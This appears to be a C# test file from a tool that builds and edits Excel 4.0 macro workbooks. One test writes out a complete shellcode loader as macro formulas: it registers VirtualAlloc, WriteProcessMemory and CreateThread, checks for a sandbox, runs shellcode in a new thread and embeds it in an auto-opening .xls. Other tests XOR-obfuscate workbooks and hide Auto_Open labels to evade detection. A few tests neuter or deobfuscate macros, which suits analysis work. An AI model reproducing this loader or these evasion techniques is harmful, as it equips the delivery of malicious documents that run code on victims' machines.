public WorkbookStream EncryptWorkbookStream(WorkbookStream wbs, string password = XorObfuscation.DefaultPassword)
{
WorkbookStream encryptedWbs = new WorkbookStream(TransformWorkbookBytes(wbs.ToBytes(), ObfuscationMode.Encrypt, password));
encryptedWbs = encryptedWbs.FixBoundSheetOffsets();
return(encryptedWbs);
}
public void TestParseMassSelectionWithArgument()
{
WorkbookStream wbs = TestHelpers.GetMassSelectUDFArgumentSheet();
string dumpString = RecordHelper.GetRelevantRecordDumpString(wbs);
Console.WriteLine(dumpString);
}
public void TestConstructorAndToBytes()
{
byte[] wbBytes = TestHelpers.GetTemplateMacroBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
byte[] parsedBytes = wbs.ToBytes();
Assert.AreEqual(wbBytes.Length, parsedBytes.Length);
Assert.AreEqual(wbBytes, parsedBytes);
}
public void TestSaveEncryptedDocstream()
{
WorkbookStream obfuscatedStream = TestHelpers.GetXorObfuscatedWorkbookStream();
ExcelDocWriter writer = new ExcelDocWriter();
XorObfuscation xorObfuscation = new XorObfuscation();
WorkbookStream deobfuscatedStream = xorObfuscation.DecryptWorkbookStream(obfuscatedStream);
WorkbookStream reObfuscatedStream = xorObfuscation.EncryptWorkbookStream(deobfuscatedStream);
writer.WriteDocument("C:\\Users\\Weber\\source\\repos\\michaelweber\\Macrome\\bin\\Debug\\netcoreapp2.0\\test-encrypted2.xls", reObfuscatedStream);
}
public void TestContainsRecord()
{
byte[] wbBytes = TestHelpers.GetTemplateMacroBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
BoundSheet8 notContainedRecord = new BoundSheet8(BoundSheet8.HiddenState.Visible, BoundSheet8.SheetType.Worksheet, "MySheetName");
BoundSheet8 containedRecord = wbs.GetAllRecordsByType <BoundSheet8>().First();
Assert.IsTrue(wbs.ContainsRecord(containedRecord));
Assert.IsFalse(wbs.ContainsRecord(notContainedRecord));
}
public void TestDeobfuscation()
{
byte[] wbBytes = TestHelpers.GetMacroTestBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
wbs = wbs.ObfuscateAutoOpen();
List <Lbl> labels = wbs.GetAutoOpenLabels();
Assert.AreEqual(1, labels.Count);
}
public void InsertFormulaTest()
{
byte[] wbBytes = TestHelpers.GetMacroTestBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
List <Formula> formulas = wbs.GetAllRecordsByType <Formula>();
int numRecordsInSheet = formulas.Count - 1;
List <string> macros = new List <string>()
{
"=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",
"=ALERT(\"Into Payload Loader\",2)",
"=REGISTER(\"Kernel32\",\"VirtualAlloc\",\"JJJJJ\",\"VA\",,1,0)",
"=REGISTER(\"Kernel32\",\"CreateThread\",\"JJJJJJJ\",\"CT\",,1,0)",
"=REGISTER(\"Kernel32\",\"WriteProcessMemory\",\"JJJCJJ\",\"WPM\",,1,0)",
"=VA(0,1000000,4096,64)",
"=SELECT(R1C3)",
"=SET.VALUE(R1C4,0)",
"=WHILE(ACTIVE.CELL()<>\"END\")",
"=WPM(-1,R6C2+R1C4,ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)",
"=SET.VALUE(R1C4,R1C4+LEN(ACTIVE.CELL()))",
"=SELECT(,\"R[1]C\")",
"=NEXT()",
"=ALERT(\"Popping Calc\",2)",
"=CT(0,0,R6C2,0,0,0)",
"=ALERT(\"Closing Thread\",2)",
"=HALT()"
};
List <string> payload = FormulaHelper.BuildPayloadMacros(TestHelpers.GetPopCalcShellcode());
List <BiffRecord> formulasToAdd = FormulaHelper.ConvertStringsToRecords(macros, numRecordsInSheet, 0, 0, 1);
formulasToAdd.AddRange(FormulaHelper.ConvertStringsToRecords(payload, numRecordsInSheet + formulasToAdd.Count, 0, 0, 2));
Formula haltFormula = formulas.Last();
Formula modifiedHaltFormula = ((BiffRecord)haltFormula.Clone()).AsRecordType <Formula>();
modifiedHaltFormula.rw = (ushort)(numRecordsInSheet + formulasToAdd.Count);
Formula gotoFormula = FormulaHelper.GetGotoFormulaForCell(modifiedHaltFormula.rw, modifiedHaltFormula.col, 0, 1);
WorkbookStream modifiedStream = wbs.InsertRecords(formulasToAdd, haltFormula);
modifiedStream = modifiedStream.ReplaceRecord(haltFormula, gotoFormula);
modifiedStream = modifiedStream.ObfuscateAutoOpen();
ExcelDocWriter writer = new ExcelDocWriter();
writer.WriteDocument(TestHelpers.AssemblyDirectory + Path.DirectorySeparatorChar + "not-equals-parser-bug.xls", modifiedStream);
}
public void TestFormulaToStringConversion()
{
WorkbookStream wbs = TestHelpers.GetMacroLoopWorkbookStream();
List <RecordType> relevantTypes = new List <RecordType>()
{
RecordType.BoundSheet8, //Sheet definitions (Defines macro sheets + hides them)
RecordType.Lbl, //Named Cells (Contains Auto_Start)
RecordType.Formula //The meat of most cell content
};
List <BiffRecord> relevantRecords = wbs.Records.Where(rec => relevantTypes.Contains(rec.Id)).ToList();
relevantRecords = RecordHelper.ConvertToSpecificRecords(relevantRecords);
relevantRecords = PtgHelper.UpdateGlobalsStreamReferences(relevantRecords);
List <string> results = relevantRecords.Select(r => r.ToHexDumpString()).ToList();
string b1formula = results.Where(res => res.StartsWith("Formula[B1]")).First();
Assert.AreEqual("Formula[B1]: invokeChar=A11", b1formula);
string b2formula = results.Where(res => res.StartsWith("Formula[B2]")).First();
Assert.AreEqual("Formula[B2]: var=999", b2formula);
string b5formula = results.Where(res => res.StartsWith("Formula[B5]")).First();
Assert.AreEqual("Formula[B5]: InvokeFormula(\"=HALT()\",A1)", b5formula);
string b6formula = results.Where(res => res.StartsWith("Formula[B6]")).First();
Assert.AreEqual("Formula[B6]: WProcessMemory(-1,B2+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)", b6formula);
string a11formula = results.Where(res => res.StartsWith("Formula[A11]")).First();
Assert.AreEqual("Formula[A11]: RETURN(CHAR(var))", a11formula);
string a12formula = results.Where(res => res.StartsWith("Formula[A12]")).First();
Assert.AreEqual("Formula[A12]: RETURN(FORMULA(arg1,arg2))", a12formula);
string d13formula = results.Where(res => res.StartsWith("Formula[D13]")).First();
Assert.AreEqual("Formula[D13]: stringToBuild=stringToBuild&invokeChar()", d13formula);
string d14formula = results.Where(res => res.StartsWith("Formula[D14]")).First();
Assert.AreEqual("Formula[D14]: curCell=ABSREF(\"R[1]C\",curCell)", d14formula);
}
public void CharRoundMacroFormulaTest()
{
WorkbookStream wbs = TestHelpers.GetCharRoundMacroWorkbookStream();
List <Formula> formulas = wbs.GetAllRecordsByType <Formula>();
Formula firstFormula = formulas.First();
List <AbstractPtg> ptgStack = firstFormula.ptgStack.Reverse().ToList();
Assert.AreEqual(typeof(PtgInt), ptgStack[0].GetType());
Assert.AreEqual(typeof(PtgInt), ptgStack[1].GetType());
Assert.AreEqual(typeof(PtgFunc), ptgStack[2].GetType());
Assert.AreEqual(typeof(PtgFunc), ptgStack[3].GetType());
}
public void TestLabelSerialization()
{
WorkbookStream macroWorkbookStream = TestHelpers.GetMultiSheetMacroBytes();
List <SupBook> supBooks = macroWorkbookStream.GetAllRecordsByType <SupBook>();
List <Lbl> labels = macroWorkbookStream.GetAllRecordsByType <Lbl>();
Lbl lastLabel = labels.Last();
Lbl cloneLabel = ((BiffRecord)lastLabel.Clone()).AsRecordType <Lbl>();
byte[] labelBytes = lastLabel.GetBytes();
byte[] cloneBytes = cloneLabel.GetBytes();
Assert.AreEqual(labelBytes, cloneBytes);
}
public void TestGetAutoOpenLabels()
{
byte[] wbBytes = TestHelpers.GetMacroTestBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
wbs = wbs.ObfuscateAutoOpen();
List <Lbl> labels = wbs.GetAutoOpenLabels();
Assert.AreEqual(1, labels.Count);
WorkbookStream hiddenLblSheet = TestHelpers.GetBuiltinHiddenLblSheet();
labels = hiddenLblSheet.GetAutoOpenLabels();
Assert.AreEqual(1, labels.Count);
}
public void TestEncryptDoc()
{
WorkbookStream obfuscatedStream = TestHelpers.GetXorObfuscatedWorkbookStream();
XorObfuscation xorObfuscation = new XorObfuscation();
WorkbookStream deobfuscatedStream = xorObfuscation.DecryptWorkbookStream(obfuscatedStream);
WorkbookStream reObfuscatedStream = xorObfuscation.EncryptWorkbookStream(deobfuscatedStream);
foreach (var record in reObfuscatedStream.Records)
{
Console.WriteLine(record.ToHexDumpString(0x1000, false));
}
CodePage originalCpRecord = obfuscatedStream.GetAllRecordsByType <CodePage>().First();
CodePage newCpRecord = reObfuscatedStream.GetAllRecordsByType <CodePage>().First();
Assert.AreEqual(originalCpRecord.cv, newCpRecord.cv);
}
public void TestAddMacroSheet()
{
byte[] wbBytes = TestHelpers.GetTemplateMacroBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
byte[] mtBytes = TestHelpers.GetMacroTestBytes();
WorkbookStream macroWorkbookStream = new WorkbookStream(mtBytes);
BoundSheet8 macroSheet = new BoundSheet8(BoundSheet8.HiddenState.Visible, BoundSheet8.SheetType.Macrosheet, "MacroSheet");
List <BOF> macroWorkbookBofs = macroWorkbookStream.GetAllRecordsByType <BOF>();
BOF LastBofRecord = macroWorkbookBofs.Last();
List <BiffRecord> sheetRecords = macroWorkbookStream.GetRecordsForBOFRecord(LastBofRecord);
byte[] sheetBytes = RecordHelper.ConvertBiffRecordsToBytes(sheetRecords);
wbs = wbs.AddSheet(macroSheet, sheetBytes);
ExcelDocWriter writer = new ExcelDocWriter();
writer.WriteDocument(TestHelpers.AssemblyDirectory + Path.DirectorySeparatorChar + "addedsheet.xls", wbs.ToBytes());
}
public void TestDecryptObfuscatedDoc()
{
WorkbookStream obfuscatedStream = TestHelpers.GetXorObfuscatedWorkbookStream();
XorObfuscation xorObfuscation = new XorObfuscation();
WorkbookStream deobfuscatedStream = xorObfuscation.DecryptWorkbookStream(obfuscatedStream);
foreach (var record in deobfuscatedStream.Records)
{
Console.WriteLine(record.ToHexDumpString(0x1000, false));
}
List <Lbl> AutoOpenLabels = deobfuscatedStream.GetAutoOpenLabels();
Assert.AreEqual(1, AutoOpenLabels.Count);
List <FilePass> filePassRecords = deobfuscatedStream.GetAllRecordsByType <FilePass>();
Assert.AreEqual(0, filePassRecords.Count);
}
public void TestReplaceRecord()
{
byte[] wbBytes = TestHelpers.GetTemplateMacroBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
BoundSheet8 bs8 = new BoundSheet8(BoundSheet8.HiddenState.Visible, BoundSheet8.SheetType.Worksheet, "MySheetName");
var recordCount = wbs.Records.Count;
BoundSheet8 oldSheetRecord = wbs.GetAllRecordsByType <BoundSheet8>().First();
WorkbookStream wbs2 = wbs.ReplaceRecord(oldSheetRecord, bs8);
Assert.AreEqual(recordCount, wbs2.Records.Count);
BoundSheet8 newSheetRecord = wbs2.GetAllRecordsByType <BoundSheet8>().First();
Assert.AreEqual(newSheetRecord.stName.Value, bs8.stName.Value);
Assert.IsFalse(wbs2.ContainsRecord(oldSheetRecord));
Assert.IsTrue(wbs2.ContainsRecord(bs8));
}
public void TestRemoveRecord()
{
byte[] wbBytes = TestHelpers.GetMacroTestBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
BiffRecord haltRecord = wbs.GetAllRecordsByType <Formula>().Last();
List <Formula> formulas = wbs.GetAllRecordsByType <Formula>();
Assert.AreEqual(3, formulas.Count);
wbs = wbs.RemoveRecord(haltRecord);
formulas = wbs.GetAllRecordsByType <Formula>();
Assert.AreEqual(2, formulas.Count);
foreach (var formula in formulas)
{
List <AbstractPtg> ptgs = formula.ptgStack.ToList();
List <PtgFunc> funcs = ptgs.Where(p => p.Id == PtgNumber.PtgFunc).Cast <PtgFunc>().ToList();
bool haltFunctionExists = funcs.Any(func => func.Ftab == FtabValues.HALT);
Assert.AreEqual(false, haltFunctionExists);
}
}
public void TestNeuterCells()
{
WorkbookStream wbs = TestHelpers.GetBuiltinHiddenLblSheet();
WorkbookEditor wbe = new WorkbookEditor(wbs);
wbs = wbe.NeuterAutoOpenCells();
Formula autoOpenCell = wbs.GetAllRecordsByType <Formula>().First();
List <AbstractPtg> openCellPtgStack = autoOpenCell.ptgStack.ToList();
Assert.AreEqual(typeof(PtgFunc), openCellPtgStack[0].GetType());
Assert.AreEqual(typeof(PtgConcat), openCellPtgStack.Last().GetType());
PtgFunc firstItem = (PtgFunc)openCellPtgStack[0];
Assert.AreEqual(FtabValues.HALT, firstItem.Ftab);
ExcelDocWriter writer = new ExcelDocWriter();
writer.WriteDocument(TestHelpers.AssemblyDirectory + Path.DirectorySeparatorChar + "neutered-sheet.xls", wbs.ToBytes());
}
public void AutoOpenSerializationTest()
{
WorkbookStream autoOpenStream = new WorkbookStream(TestHelpers.GetAutoOpenTestBytes());
List <Lbl> lbls = autoOpenStream.GetAllRecordsByType <Lbl>();
//auto_open_test.xls contains a Lbl for Auto_Open222
Lbl autoOpenLabel = lbls.First(l => l.fBuiltin);
byte[] labelBytes = autoOpenLabel.Name.Bytes;
//Should be length 4, 1 byte for the builtin string lookup, 3 bytes for 222
Assert.AreEqual(4, autoOpenLabel.cch);
//Not a unicode string, so fHighBit is 0
Assert.AreEqual((byte)0x00, labelBytes[0]);
//Starts with the Auto_Open builtin value of 1
Assert.AreEqual((byte)0x01, labelBytes[1]);
//Should be followed by whatever we append to the end, in this case 222
Assert.AreEqual((byte)'2', labelBytes[2]);
Assert.AreEqual((byte)'2', labelBytes[3]);
Assert.AreEqual((byte)'2', labelBytes[4]);
}
public void TestAddingSheetRecord()
{
byte[] wbBytes = TestHelpers.GetTemplateMacroBytes();
WorkbookStream wbs = new WorkbookStream(wbBytes);
BoundSheet8 bs8 = new BoundSheet8(BoundSheet8.HiddenState.Visible, BoundSheet8.SheetType.Macrosheet, "MyMacroSheet");
BoundSheet8 correctOffsetBs8 = ((BiffRecord)bs8.Clone()).AsRecordType <BoundSheet8>();
BoundSheet8 oldSheetRecord = wbs.GetAllRecordsByType <BoundSheet8>().First();
BoundSheet8 newSheetRecord = ((BiffRecord)oldSheetRecord.Clone()).AsRecordType <BoundSheet8>();
// bs8.lbPlyPos = (uint) (oldSheetRecord.lbPlyPos + bs8.GetBytes().Length);
List <BOF> bofRecords = wbs.GetAllRecordsByType <BOF>();
BOF spreadSheetBOF = bofRecords.Last();
// newSheetRecord.lbPlyPos = bs8.lbPlyPos;
long offset = wbs.GetRecordByteOffset(spreadSheetBOF);
bs8.lbPlyPos = oldSheetRecord.lbPlyPos;
wbs = wbs.InsertRecord(bs8, oldSheetRecord);
offset = wbs.GetRecordByteOffset(spreadSheetBOF);
correctOffsetBs8.lbPlyPos = (uint)offset;
newSheetRecord.lbPlyPos = (uint)offset;
wbs = wbs.ReplaceRecord(bs8, correctOffsetBs8);
wbs = wbs.ReplaceRecord(oldSheetRecord, newSheetRecord);
ExcelDocWriter writer = new ExcelDocWriter();
writer.WriteDocument(TestHelpers.AssemblyDirectory + Path.DirectorySeparatorChar + "testbook.xls", wbs.ToBytes());
}
public void TestGetDefaultMacroSheetInternationalized()
{
Intl manuallyCreatedIntlRecord = new Intl();
byte[] intlBytes = manuallyCreatedIntlRecord.GetBytes();
BiffRecord rec = new BiffRecord(intlBytes);
Intl convertedRecord = rec.AsRecordType <Intl>();
Assert.AreEqual(convertedRecord.GetBytes(), manuallyCreatedIntlRecord.GetBytes());
WorkbookStream wbs = TestHelpers.GetDefaultMacroTemplate();
List <BiffRecord> sheetRecords = wbs.GetRecordsForBOFRecord(wbs.GetAllRecordsByType <BOF>().Last());
WorkbookStream internationalWbs = new WorkbookStream(sheetRecords);
var intlRecord = new Intl();
internationalWbs = internationalWbs.InsertRecord(intlRecord, internationalWbs.GetAllRecordsByType <b2xtranslator.Spreadsheet.XlsFileFormat.Records.Index>().First());
Assert.IsTrue(internationalWbs.ContainsRecord(intlRecord));
var nextRecord = internationalWbs.Records.SkipWhile(r => r.Id != RecordType.Intl).Skip(1).Take(1).First();
Assert.IsTrue(nextRecord.Id == RecordType.CalcMode);
}
public void TestChangeLabel()
{
WorkbookStream macroWorkbookStream = new WorkbookStream(TestHelpers.GetMacroTestBytes());
List <Lbl> labels = macroWorkbookStream.GetAllRecordsByType <Lbl>();
Lbl autoOpenLbl = labels.First(l => l.fBuiltin && l.Name.Value.Equals("\u0001"));
Lbl replaceLabelStringLbl = ((BiffRecord)autoOpenLbl.Clone()).AsRecordType <Lbl>();
replaceLabelStringLbl.SetName(new XLUnicodeStringNoCch("Auto_Open", true));
replaceLabelStringLbl.fBuiltin = false;
var cloneLabel = ((BiffRecord)replaceLabelStringLbl.Clone()).AsRecordType <Lbl>();
var cBytes = cloneLabel.GetBytes();
var rLabelBytes = replaceLabelStringLbl.GetBytes();
Assert.AreEqual(rLabelBytes, cBytes);
macroWorkbookStream = macroWorkbookStream.ReplaceRecord(autoOpenLbl, replaceLabelStringLbl);
macroWorkbookStream = macroWorkbookStream.FixBoundSheetOffsets();
ExcelDocWriter writer = new ExcelDocWriter();
writer.WriteDocument(TestHelpers.AssemblyDirectory + Path.DirectorySeparatorChar + "changedLabel.xls", macroWorkbookStream.ToBytes());
}
public Emulator(WorkbookStream wbs)
{
this.wbs = wbs;
}
